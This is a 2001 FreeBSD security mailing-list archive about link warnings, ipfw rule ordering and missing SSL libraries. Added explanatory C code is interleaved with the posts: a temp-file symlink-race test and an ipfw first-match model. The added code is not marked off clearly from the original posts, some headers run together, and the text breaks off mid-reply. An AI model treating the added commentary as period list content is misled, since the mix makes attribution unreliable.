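/* mkstemp() does the O_EXCL create itself, with an unguessable suffix and mode
 * 0600. Returns 1 if the file it made is a regular file with mode 0600. */
int mkstemp_gives_private_file(void)
{
    char dir[32] = "/tmp/tmprace.XXXXXX", path[PATH_MAX];
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(path, sizeof path, "%s/app.XXXXXX", dir);
    int fd = mkstemp(path);
    if (fd < 0) { rmdir(dir); return -1; }
    struct stat st;
    int ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & 0777) == 0600;
    close(fd);
    unlink(path);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("name-then-open clobbered the victim: %d\n", unsafe_pattern_clobbers_victim());
    printf("O_EXCL refused the planted symlink:  %d\n", safe_pattern_refuses_symlink());
    printf("mkstemp() gave a private 0600 file:  %d\n", mkstemp_gives_private_file());
    return 0;
}
```

The same reasoning applies to tmpnam(): the name it returns is only "unused" at the instant it is computed, so the fix is never a better name generator but an atomic create (O_EXCL, mkstemp(), or tmpfile()). gets() is a different class of warning, a plain buffer overflow with no safe form, and the replacement is fgets() with an explicit size.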
From owner-freebsd-security Wed May 9 3:53:52 2001
Date: Wed, 9 May 2001 13:53:18 +0300
From: Peter Pentchev
To: Rasputin
Cc: Paul Herman, security@freebsd.org
Subject: Re: setkey(3) not present in the system
Message-ID: <20010509135318.B44191@ringworld.oblivion.bg>
References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509114907.A48960@dogma.freebsd-uk.eu.org>
In-Reply-To: <20010509114907.A48960@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 11:49:07AM +0100

On Wed, May 09, 2001 at 11:49:07AM +0100, Rasputin wrote:
> * Paul Herman [010509 11:41]:
> > On Wed, 9 May 2001, Rasputin wrote:
> >
> > > Anybody know where I can get these functions?
> > > Thanks.
> > >
> > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system!
> > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
> > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
> > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!
>
> > Just follow your nose, it always knows! :-)
> > des_setkey(3) manpage mentions -lcipher. Looks like it's in
>
> If you could see the size of my nose, you'd be even more amazed I missed this..
> Someone else mentioned -lcipher, I'll throw that in and give it a whirl.
>
> Thanks.
>
> Incidentally, (and OT-ly), this is my favourite error message...
>
> > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid.

The fact that the message sounds interesting is quite OT; however, what it states could be quite important - see my other e-mail on the subject. It seems that the writers of the WAP gateway in question are trying to do something in a way too smart for their own good..

/me shudders at the memory of the recent -current stdio internals change, and the horrible fate of programs that assumed too much..

G'luck,
Peter

--
This sentence no verb.

From owner-freebsd-security Wed May 9 4:16:16 2001
Date: Wed, 9 May 2001 13:16:03 +0200
From: Szilveszter Adam
To: security@freebsd.org
Subject: Re: setkey(3) not present in the system
Message-ID: <20010509131603.D18390@petra.hos.u-szeged.hu>
References: <20010509104313.A47276@dogma.freebsd-uk.eu.org>
In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 10:43:13AM +0100

On Wed, May 09, 2001 at 10:43:13AM +0100, Rasputin wrote:
>
> Morning all.
> I'm trying to port a WAP gateway to BSD, I've managed to get it to roll
> a binary, but want to quench these warnings before I submit it.
> (see bottom)

Although I am far from a programming nose (hm:-) I remember these warnings when you link against libc like this: -lc. This is not needed in my experience anyway, but seems to be required on some other UNIX platforms. On FreeBSD, you don't need the -lc. (or -lC or other variants thereof. I could find an interesting sampler in the Mozilla PSM code not long ago...)

Of course, just my HUF 0.02...

--
Regards:
Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Wed May 9 4:21:11 2001
Date: Wed, 9 May 2001 04:21:07 -0700
From: Kris Kennaway
To: Peter Pentchev
Cc: Rasputin, Paul Herman, security@FreeBSD.ORG
Subject: Re: setkey(3) not present in the system
Message-ID: <20010509042107.A36279@xor.obsecurity.org>
References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509114907.A48960@dogma.freebsd-uk.eu.org> <20010509135318.B44191@ringworld.oblivion.bg>
In-Reply-To: <20010509135318.B44191@ringworld.oblivion.bg>; from roam@orbitel.bg on Wed, May 09, 2001 at 01:53:18PM +0300

On Wed, May 09, 2001 at 01:53:18PM +0300, Peter Pentchev wrote:
> On Wed, May 09, 2001 at 11:49:07AM +0100, Rasputin wrote:
> > * Paul Herman [010509 11:41]:
> > > On Wed, 9 May 2001, Rasputin wrote:
> > >
> > > > Anybody know where I can get these functions?
> > > > Thanks.
> > > >
> > > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system!
> > > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
> > > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
> > > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!
> >
> > > Just follow your nose, it always knows! :-)
> > > des_setkey(3) manpage mentions -lcipher. Looks like it's in
> >
> > If you could see the size of my nose, you'd be even more amazed I missed this..
> > Someone else mentioned -lcipher, I'll throw that in and give it a whirl.
> >
> > Thanks.
> >
> > Incidentally, (and OT-ly), this is my favourite error message...
> >
> > > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid.
>
> The fact that the message sounds interesting is quite OT; however, what
> it states could be quite important - see my other e-mail on the subject.
> It seems that the writers of the WAP gateway in question are trying to do
> something in a way too smart for their own good..

There's something nonstandard about the way it's linking which is triggering all of the __warn_references() in libc regardless of whether or not the code actually uses those "dangerous" functions -- I don't know what it is, but I've seen it a lot in ports. It's probably a bug which should be fixed.

Kris

From owner-freebsd-security Wed May 9 4:35:30 2001
Date: Wed, 9 May 2001 14:34:55 +0300
From: Peter Pentchev
To: Kris Kennaway
Cc: Rasputin, Paul Herman, security@FreeBSD.ORG
Subject: Re: setkey(3) not present in the system
Message-ID: <20010509143455.C44191@ringworld.oblivion.bg>
References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509114907.A48960@dogma.freebsd-uk.eu.org> <20010509135318.B44191@ringworld.oblivion.bg> <20010509042107.A36279@xor.obsecurity.org>
In-Reply-To: <20010509042107.A36279@xor.obsecurity.org>; from kris@obsecurity.org on Wed, May 09, 2001 at 04:21:07AM -0700

On Wed, May 09, 2001 at 04:21:07AM -0700, Kris Kennaway wrote:
> On Wed, May 09, 2001 at 01:53:18PM +0300, Peter Pentchev wrote:
> > On Wed, May 09, 2001 at 11:49:07AM +0100, Rasputin wrote:
> > > * Paul Herman [010509 11:41]:
> > > > On Wed, 9 May 2001, Rasputin wrote:
> > > >
> > > > > Anybody know where I can get these functions?
> > > > > Thanks.
> > > > >
> > > > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system!
> > > > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
> > > > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
> > > > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!
> > >
> > > > Just follow your nose, it always knows! :-)
> > > > des_setkey(3) manpage mentions -lcipher. Looks like it's in
> > >
> > > If you could see the size of my nose, you'd be even more amazed I missed this..
> > > Someone else mentioned -lcipher, I'll throw that in and give it a whirl.
> > >
> > > Thanks.
> > >
> > > Incidentally, (and OT-ly), this is my favourite error message...
> > >
> > > > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid.
> >
> > The fact that the message sounds interesting is quite OT; however, what
> > it states could be quite important - see my other e-mail on the subject.
> > It seems that the writers of the WAP gateway in question are trying to do
> > something in a way too smart for their own good..
>
> There's something nonstandard about the way it's linking which is
> triggering all of the __warn_references() in libc regardless of
> whether or not the code actually uses those "dangerous" functions -- I
> don't know what it is, but I've seen it a lot in ports. It's probably
> a bug which should be fixed.

Nothing non-standard; the one about setkey() is triggered by just trying to resolve setkey against libc's setkey symbol; similarly for the f_prealloc() one. It's just that these warnings would never be triggered if the linker saw these symbols in another library, and saw no need to touch these particular object files within libc.

As demonstrated by:

[roam@ringworld:v4 ~/tmp/lc]$ cat warnings.c
#include <unistd.h>	/* declares setkey(3) */

/*
 * bogus declaration: there is no real declaration for f_prealloc() that
 * we could use, and we do not really need it anyway..
 */
int f_prealloc(int);

void testfun(void)
{
	setkey("key");
	f_prealloc(0);
}

int main(int argc, char *argv[])
{
	return (0);
}
[roam@ringworld:v4 ~/tmp/lc]$ cc -o warnings warnings.c
/tmp/ccys5JQh.o: In function `testfun':
/tmp/ccys5JQh.o(.text+0xf): WARNING! setkey(3) not present in the system!
/tmp/ccys5JQh.o(.text+0x1c): warning: this program uses f_prealloc(), which is stupid.
[roam@ringworld:v4 ~/tmp/lc]$

As you can see, simple linking triggers it.

G'luck,
Peter

--
If I were you, who would be reading this sentence?

From owner-freebsd-security Wed May 9 4:42:53 2001
Date: Wed, 9 May 2001 18:42:28 +0700 (NOVST)
From: Max Khon
To: Rasputin
Cc: security@FreeBSD.ORG
Subject: Re: setkey(3) not present in the system
In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org>

hi, there!

On Wed, 9 May 2001, Rasputin wrote:

> Morning all.
> I'm trying to port a WAP gateway to BSD, I've managed to get it to roll
> a binary, but want to quench these warnings before I submit it.
> (see bottom)
>
> I know how to sort out mktemp() and gets(), anyone know where f_prealloc()
> lives?
>
> Anyway, the main reason I mailed this list is the 4 crypto functions
> don't seem to be implemented on my box - is that just me?
> If so, how do I get them into the c library?
> I'm not a USA resident, and used to have a line saying that in make.conf back in
> 4.0-RELEASE. Since then I've removed the line.
>
> Anybody know where I can get these functions?
> Thanks.
>
> /usr/lib/libc.so: WARNING! setkey(3) not present in the system!
> /usr/lib/libc.so: warning: this program uses gets(), which is unsafe.
> /usr/lib/libc.so: warning: mktemp() possibly used unsafely; consider using mkstemp()
> /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
> /usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
> /usr/lib/libc.so: warning: tmpnam() possibly used unsafely; consider using mkstemp()
> /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid.
> /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!

are you sure you are not linking your binary against libc_r and libc? in FreeBSD you should use -pthread option for gcc when you want your program to be linked against libc_r

/fjoe

From owner-freebsd-security Wed May 9 5: 2:31 2001
Date: Wed, 9 May 2001 13:04:46 +0100
From: Ceri
To: Greg Haa
Cc: "'freebsd-security@FreeBSD.ORG'"
Subject: Re: your mail
Message-ID: <20010509130446.B17977@cartman.techsupport.co.uk>
References: <2BFD35C3F1F9D31185CE00B0D02023028386DA@SUNKING>
In-Reply-To: <2BFD35C3F1F9D31185CE00B0D02023028386DA@SUNKING>; from Greg.Haa@amux.com on Tue, May 08, 2001 at 01:06:06PM -0700

On Tue, May 08, 2001 at 01:06:06PM -0700, Greg Haa said:
> Hey all. Can anyone tell me what this means?
>
> May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2200):
> request too small
> May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2201):
> request too small
> May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2202):
> request too small

It basically means that named received a packet that was too small to be a valid DNS request, so it ignored it.

> I have no idea if this is even the right list or if it is a cesurity
> problem.

Or even security :)

I have never worried about these.

Ceri

--
Your local RFC Nazi

From owner-freebsd-security Wed May 9 6:27:31 2001
Date: Wed, 9 May 2001 14:27:24 +0100
From: Rasputin
To: Max Khon
Cc: security@freebsd.org
Subject: Re: setkey(3) not present in the system
Message-ID: <20010509142724.A53401@dogma.freebsd-uk.eu.org>
Reply-To: Rasputin
References: <20010509104313.A47276@dogma.freebsd-uk.eu.org>
In-Reply-To: ; from fjoe@newst.net on Wed, May 09, 2001 at 06:42:28PM +0700

* Max Khon [010509 12:46]:
> hi, there!
>
> On Wed, 9 May 2001, Rasputin wrote:
>
> > /usr/lib/libc.so: WARNING! setkey(3) not present in the system!
> > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
> > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
> > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!
>
> are you sure you are not linking your binary against libc_r and libc?
> in FreeBSD you should use -pthread option for gcc when you want your
> program to be linked against libc_r

Bingo. The command line is a right mess,

cc -D_REENTRANT=1 -I. -O -pipe -march=k6 -I/usr/local/include -I/usr/local/include/libxml2 -I/usr/local/include/libxml2/libxml -o checks/check_list checks/check_list.o libgw.a libwmlscript.a libgwlib.a -lz -lm -lc_r -L/usr/local/lib -lxml2 -lz -L/usr/local/lib -lgiconv

The only libpthread I have is in /usr/compat/linux/lib:

rasputin@shikima kannel]$locate libpthread
/usr/compat/linux/lib/libpthread-0.8.so
/usr/compat/linux/lib/libpthread.so.0

- is it supposed to be in the base system?

This has got less and less to do with security, and more to do with me biting off more than I can chew, now...

So I'll shut up :)

--
Armadillo: To provide weapons to a Spanish pickle
Rasputin :: Jack of All Trades - Master of Nuns ::

From owner-freebsd-security Wed May 9 6:32: 0 2001
Date: Wed, 9 May 2001 14:31:56 +0100
From: Rasputin
To: security@freebsd.org
Subject: Re: setkey(3) not present in the system
Message-ID: <20010509143156.A53786@dogma.freebsd-uk.eu.org>
Reply-To: Rasputin
References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509142724.A53401@dogma.freebsd-uk.eu.org>
In-Reply-To: <20010509142724.A53401@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 02:27:24PM +0100

* Rasputin [010509 14:28]:
> The only libpthread I have is in /usr/compat/linux/lib:
> - is it supposed to be in the base system?
> So I'll shut up :)

Shut up, brain. Brain, shut up.

Ignore me, distinct lack of caffeine today. Have now read pthread(3), and am self-larting as we speak.

Thanks for an education. :)

--
You may be sure that when a man begins to call himself a "realist," he is preparing to do something he is secretly ashamed of doing.
-- Sydney Harris
Rasputin :: Jack of All Trades - Master of Nuns ::

From owner-freebsd-security Wed May 9 6:44:52 2001
Date: Wed, 9 May 2001 20:44:32 +0700 (NOVST)
From: Max Khon
To: Rasputin
Cc: security@freebsd.org
Subject: Re: setkey(3) not present in the system
In-Reply-To: <20010509142724.A53401@dogma.freebsd-uk.eu.org>

hi, there!

On Wed, 9 May 2001, Rasputin wrote:

> > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system!
> > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system!
> > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system!
> > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system!
> >
> > are you sure you are not linking your binary against libc_r and libc?
> > in FreeBSD you should use -pthread option for gc when you want your
> > program to be linked against libc_r
>
> Bingo. The command line is a right mess,
>
> cc -D_REENTRANT=1 -I. -O -pipe -march=k6 -I/usr/local/include -I/usr/local/include/libxml2 -I/usr/local/include/libxml2/libxml -o checks/check_list checks/check_list.o libgw.a libwmlscript.a libgwlib.a -lz -lm -lc_r -L/usr/local/lib -lxml2 -lz -L/usr/local/lib -lgiconv
>
> The only libpthread I have is in /usr/compat/linux/lib:
> rasputin@shikima kannel]$locate libpthread
> /usr/compat/linux/lib/libpthread-0.8.so
> /usr/compat/linux/lib/libpthread.so.0
>
> - is it supposed to be in the base system?
>
> This has got less and less to do with security, and more to do with
> me biting off more than I can chew, now...
>
> So I'll shut up :)

if you want threads in FreeBSD (at least in 4.x and earlier) you need to link specifying '-pthread' option for gcc. Having specified this option you will have your program linked against libc_r. Explicit -lc_r options for linking are not needed. FreeBSD 4.x does not have libpthread (all the needed functionality is contained in libc_r).

/fjoe

From owner-freebsd-security Wed May 9 9: 5: 4 2001
Date: 9 May 2001 09:05:00 -0700
Message-ID: <20010509160500.7232.cpmta@c000.sfo.cp.net>
To: FreeBSD-security@FreeBSD.org
From: Michael Sharp
Subject: Ip filtering with ipfw

I am very new to FreeBSD, and have some questions about ipfw

I compiled:

options IPFIREWALL

into my kernel, and added:

firewall_enable="YES"

in /etc/rc.conf

on reboot, I see ipfiltering initializing and the default policy is to deny. After reboot, I do:

ipfw list

and get this:

00100 allow ip from any to any via lo0
00200 deny ip from any to 127.0.0.0/8
00300 deny ip from 127.0.0.0/8 to any
65000 allow ip from any to any
65535 deny ip from any to any

which I am assuming is the defaults.

Now, to keep it simple, I have a router between my internal machine ( 192.168.1.3 ) and the Internet and I set the router to allow only port 113 in to 192.168.1.3

ifconfig reveals that my ethernet card is on x10

I added to ipfw:

ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10
ipfw add deny all from any to 192.168.1.3 0-1023 in via x10

199.163.7.34 is the ip of a DALnet IRC server that checks identd

My thinking here was I only wanted 199.163.7.34 to get an identd response on 113 and block all the others from getting a response on 113. However, all the OTHER DALnet servers are getting a response from 113 ( not just 199.163.7.34 ) and when I ran nmap from a friend's box, it showed 113 open.

What am I missing?
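The rules in the post above are fine; where they land is the problem. ipfw evaluates rules in numeric order and the first match wins, and "ipfw add" without a number appends the rule after the highest one already installed (the assumption used here, FreeBSD 4.x behaviour: 100 above the highest non-default rule). With the "open" boot ruleset that means 65100 and 65200, behind the "65000 allow ip from any to any" that already accepted the packet. The following is an added example, not code from the post or from ipfw: a small model of that first-match evaluation, fed the exact rules the poster listed, first as typed and then with explicit numbers (1000 and 1100) that put them ahead of 65000. "x10" is the interface name as the post gives it, and 203.0.113.9 is a constructed address standing in for "another DALnet server".

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the post: a model of ipfw's first-match
 * evaluation, showing why the two rules above never fire. Assumption
 * (FreeBSD 4.x ipfw): "ipfw add" without a number places the rule 100 above
 * the highest existing non-default rule, i.e. behind 65000 here. 203.0.113.9
 * is a constructed address standing in for "another DALnet server". */

enum action { ALLOW, DENY };
enum proto  { P_IP, P_TCP };                    /* P_IP == "ip"/"all" */
struct cidr    { uint32_t addr, mask; };        /* mask 0 == any */
struct rule    { unsigned num; enum action act; enum proto proto; struct cidr src, dst;
                 unsigned dport_lo, dport_hi; const char *iface; };   /* hi 0 == any port */
struct packet  { enum proto proto; uint32_t src, dst; unsigned dport; const char *in_iface; };
struct verdict { unsigned num; enum action act; };
struct ruleset { struct rule r[16]; size_t n; };    /* 16 is plenty for this demo */
#define DEFAULT_RULE 65535u

static uint32_t ip4(int a, int b, int c, int d)
{ return ((uint32_t)a << 24) | ((uint32_t)b << 16) | ((uint32_t)c << 8) | (uint32_t)d; }
static struct cidr cidr(uint32_t addr, int bits)
{ struct cidr c = { addr, bits ? 0xffffffffu << (32 - bits) : 0 }; return c; }
static struct rule mk(unsigned num, enum action act, enum proto proto, struct cidr src,
                      struct cidr dst, unsigned lo, unsigned hi, const char *iface)
{ struct rule r = { num, act, proto, src, dst, lo, hi, iface }; return r; }

/* "ipfw add": auto-number when num == 0, keep the set sorted; returns the number used. */
unsigned ipfw_add(struct ruleset *rs, struct rule r)
{
    if (r.num == 0) {
        unsigned highest = 0;
        for (size_t i = 0; i < rs->n; i++)
            if (rs->r[i].num != DEFAULT_RULE && rs->r[i].num > highest)
                highest = rs->r[i].num;
        r.num = highest + 100;
    }
    size_t i = rs->n++;
    for (; i > 0 && rs->r[i - 1].num > r.num; i--)
        rs->r[i] = rs->r[i - 1];
    rs->r[i] = r;
    return r.num;
}

static int matches(const struct rule *r, const struct packet *p)
{
    if (r->proto != P_IP && r->proto != p->proto) return 0;
    if ((p->src & r->src.mask) != (r->src.addr & r->src.mask)) return 0;
    if ((p->dst & r->dst.mask) != (r->dst.addr & r->dst.mask)) return 0;
    if (r->dport_hi && (p->dport < r->dport_lo || p->dport > r->dport_hi)) return 0;
    return r->iface == NULL || strcmp(r->iface, p->in_iface) == 0;
}

/* First matching rule in numeric order decides; 65535 deny is the built-in default. */
struct verdict ipfw_decide(const struct ruleset *rs, const struct packet *p)
{
    struct verdict v = { DEFAULT_RULE, DENY };
    for (size_t i = 0; i < rs->n; i++)
        if (matches(&rs->r[i], p)) { v.num = rs->r[i].num; v.act = rs->r[i].act; break; }
    return v;
}

/* The "ipfw list" output from the post. */
static struct ruleset boot_ruleset(void)
{
    struct ruleset rs; struct cidr any = cidr(0, 0), loop = cidr(ip4(127, 0, 0, 0), 8);
    memset(&rs, 0, sizeof rs);
    ipfw_add(&rs, mk(100,   ALLOW, P_IP, any,  any,  0, 0, "lo0"));
    ipfw_add(&rs, mk(200,   DENY,  P_IP, any,  loop, 0, 0, NULL));
    ipfw_add(&rs, mk(300,   DENY,  P_IP, loop, any,  0, 0, NULL));
    ipfw_add(&rs, mk(65000, ALLOW, P_IP, any,  any,  0, 0, NULL));
    ipfw_add(&rs, mk(DEFAULT_RULE, DENY, P_IP, any, any, 0, 0, NULL));
    return rs;
}

/* The two rules from the post; num 0 means "as typed, let ipfw number it". */
static struct ruleset with_identd_rules(unsigned allow_num, unsigned deny_num)
{
    struct ruleset rs = boot_ruleset();
    struct cidr me = cidr(ip4(192, 168, 1, 3), 32), dalnet = cidr(ip4(199, 163, 7, 34), 32);
    ipfw_add(&rs, mk(allow_num, ALLOW, P_TCP, dalnet,     me, 0, 0,    "x10"));
    ipfw_add(&rs, mk(deny_num,  DENY,  P_IP,  cidr(0, 0), me, 0, 1023, "x10"));
    return rs;
}

/* An identd probe (TCP to 192.168.1.3:113, arriving on x10) from `from`. */
static struct verdict probe(struct ruleset rs, uint32_t from)
{
    struct packet p = { P_TCP, from, ip4(192, 168, 1, 3), 113, "x10" };
    return ipfw_decide(&rs, &p);
}

/* The number ipfw hands the first rule typed after boot: 65100, behind 65000. */
unsigned number_ipfw_gives_first_typed_rule(void)
{
    struct ruleset rs = boot_ruleset();
    return ipfw_add(&rs, mk(0, ALLOW, P_TCP, cidr(ip4(199, 163, 7, 34), 32),
                            cidr(ip4(192, 168, 1, 3), 32), 0, 0, "x10"));
}
struct verdict as_posted_other_server(void) { return probe(with_identd_rules(0, 0),       ip4(203, 0, 113, 9)); }
struct verdict fixed_other_server(void)     { return probe(with_identd_rules(1000, 1100), ip4(203, 0, 113, 9)); }
struct verdict fixed_dalnet_server(void)    { return probe(with_identd_rules(1000, 1100), ip4(199, 163, 7, 34)); }

int main(void)
{
    struct verdict a = as_posted_other_server(), b = fixed_other_server(), c = fixed_dalnet_server();
    printf("as typed, the first added rule becomes %u (behind the 65000 allow)\n", number_ipfw_gives_first_typed_rule());
    printf("as posted,  other server -> rule %u %s\n", a.num, a.act == ALLOW ? "allow" : "deny");
    printf("renumbered, other server -> rule %u %s\n", b.num, b.act == ALLOW ? "allow" : "deny");
    printf("renumbered, 199.163.7.34 -> rule %u %s\n", c.num, c.act == ALLOW ? "allow" : "deny");
    return 0;
}
```

The practical check on the real box is simply "ipfw list" after adding the rules: if the new entries print below 65000, they are unreachable for anything 65000 already accepts. Giving them explicit numbers (ipfw add 1000 ..., ipfw add 1100 ...) or putting them in a custom rc.firewall section that runs before the catch-all allow fixes the ordering; the nmap result from the friend's box is what first-match behaviour predicts, not an identd or router problem.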
------------------------------------------------------- Get your free, secure email at http://www.medmail.com - the e-mail service for the medical community To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 9:22:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88]) by hub.freebsd.org (Postfix) with ESMTP id 56C4237B424 for ; Wed, 9 May 2001 09:22:23 -0700 (PDT) (envelope-from jhb@FreeBSD.org) Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241]) by meow.osd.bsdi.com (8.11.2/8.11.2) with ESMTP id f49GM4G52472; Wed, 9 May 2001 09:22:05 -0700 (PDT) (envelope-from jhb@FreeBSD.org) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <002601ba1df7$4da07940$b88f39d5@a> Date: Wed, 09 May 2001 09:21:10 -0700 (PDT) From: John Baldwin To: Retal Subject: RE: Some Kernel options Cc: freebsd-security@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 09-May-95 Retal wrote: > I could not have wondered but..Its only me or other people compiling their > kernel with this options: > options KBD_INSTALL_CDEV # install a CDEV entry in /dev This allows you to use kbdcontrol(1) to switch keyboards and is quite helpful for people with USB keyboards or more than one keyboard. -- John Baldwin -- http://www.FreeBSD.org/~jhb/ PGP Key: http://www.baldwin.cx/~john/pgpkey.asc "Power Users Use the Power to Serve!" 
- http://www.FreeBSD.org/

From owner-freebsd-security Wed May 9 9:38:54 2001
From: Kris Kennaway
To: Peter Pentchev
Cc: Rasputin, Paul Herman, security@FreeBSD.ORG
Date: Wed, 9 May 2001 09:38:50 -0700
Subject: Re: setkey(3) not present in the system
Message-ID: <20010509093849.B40205@xor.obsecurity.org>
In-Reply-To: <20010509143455.C44191@ringworld.oblivion.bg>

On Wed, May 09, 2001 at 02:34:55PM +0300, Peter Pentchev wrote:
> > There's something nonstandard about the way it's linking which is
> > triggering all of the __warn_references() in libc regardless of
> > whether or not the code actually uses those "dangerous" functions -- I
> > don't know what it is, but I've seen it a lot in ports. It's probably
> > a bug which should be fixed.
>
> Nothing non-standard; the one about setkey() is triggered by just trying
> to resolve setkey against libc's setkey symbol; similarly for the f_prealloc()
> one. It's just that these warnings would never be triggered if the linker
> saw these symbols in another library, and saw no need to touch these particular
> object files within libc.

Yes, I know you get the __warn_references() if you use a libc function
which has a __warn_references() line -- what happens here is that you
ALSO get *all* __warn_references() present in the entire library, even
if you don't use *any* of those functions, if you do the Weird Linker
Thing.

Kris

From owner-freebsd-security Wed May 9 9:45: 9 2001
From: "Nathan Vidican"
Date: Wed, 9 May 2001 12:39:43 -0400
Subject: /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found
Message-ID: <001801c0d8a6$a6d23a60$7053cad1@78lb019>
I have no *ssl* files in /usr/lib, /usr/libexec, /usr/local/lib, or
/usr/local/libexec. I have manually compiled and installed OpenSSL 0.9.6a
from ftp.openssl.org, and have attempted to re-install FreeBSD twice now
over FTP. I have been installing: bin, manpages, compat4x, crypto, and
local. Am I just missing the right distro? Or is the Release broken or
something? Where are the ssl libraries? I am attempting to install/configure
apache+ssl, (from the packages), this is what I get:

mx2# httpsdctl configtest
/usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found
mx2#

I have sent a few messages back and forth now from questions@freebsd.org,
but someone had suggested I send this question here. So here I am. If anyone
has any ideas I'd be happy to hear them?
I noticed that libssl.so.1 is supposed to be a symbolic link, (as
dictated by various threads I found searching the mailing lists), but the
file it would link to isn't even there?
Nathan Vidican
Nathan@Vidican.com
http://Nathan.Vidican.com/

From owner-freebsd-security Wed May 9 9:47:19 2001
From: Jamie Heckford
To: Michael Sharp
Cc: freebsd-security@freebsd.org
Date: Wed, 9 May 2001 18:45:52 +0100
Subject: Re: Ip filtering with ipfw
Message-ID: <20010509184552.E6456@storm.psi-domain.co.uk>
In-Reply-To: <20010509160500.7232.cpmta@c000.sfo.cp.net>

Here's a few examples:

ipfw -f flush
ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 113 in via xl0
ipfw add allow tcp from 192.168.1.0/24 to any
ipfw add deny log ip from any to 192.168.1.0/24 in via xl0

Of course, this is NOT a ruleset you should use in practice, and wouldn't
work very well! For more examples see /etc/rc.firewall.

Jamie

On 2001.05.09 17:05 Michael Sharp wrote:
> I am very new to FreeBSD, and have some questions about ipfw
> I compiled: options IPFIREWALL
> into my kernel, and added: firewall_enable="YES" in /etc/rc.conf
> on reboot, I see ipfiltering initializing and the default policy is to
> deny.
> After reboot, I do: ipfw list and get this:
>
> 00100 allow ip from any to any via lo0
> 00200 deny ip from any to 127.0.0.0/8
> 00300 deny ip from 127.0.0.0/8 to any
> 65000 allow ip from any to any
> 65535 deny ip from any to any
>
> which I am assuming is the defaults. Now, to keep it simple, I have a
> router between my internal machine ( 192.168.1.3 ) and the Internet and I
> set the router to allow only port 113 in to 192.168.1.3
>
> ifconfig reveals that my ethernet card is on x10
>
> I added to ipfw:
>
> ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10
> ipfw add deny all from any to 192.168.1.3 0-1023 in via x10
>
> 199.163.7.34 is the ip of a DALnet IRC server that checks identd
> My thinking here was I only wanted 199.163.7.34 to get an identd response
> on 113 and block all the others from getting a response on 113. However,
> all the OTHER DALnet servers are getting a response from 113 ( not just
> 199.163.7.34 ) and when I ran nmap from a friend's box, it showed 113
> open.
>
> What am I missing?

--
Jamie Heckford
Network Operations Manager
Psi-Domain - Innovative Linux Solutions. Ask Us How.
FreeBSD - The power to serve

Join our mailing list and stay informed by emailing
majordomo@psi-domain.co.uk with the line: subscribe collective
=====================================
email: heckfordj@psi-domain.co.uk
web: http://www.psi-domain.co.uk/
tel: +44 (0)1737 789 246
fax: +44 (0)1737 789 245
mobile: +44 (0)7866 724 224
=====================================

From owner-freebsd-security Wed May 9 9:52:47 2001
From: Kris Kennaway
To: Nathan Vidican
Cc: security@freebsd.org
Date: Wed, 9 May 2001 09:52:43 -0700
Subject: Re: /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found
Message-ID: <20010509095243.A40684@xor.obsecurity.org>
In-Reply-To: <001801c0d8a6$a6d23a60$7053cad1@78lb019>

On Wed, May 09, 2001 at 12:39:43PM -0400, Nathan Vidican wrote:
> I have no *ssl* files in /usr/lib, /usr/libexec, /usr/local/lib, or
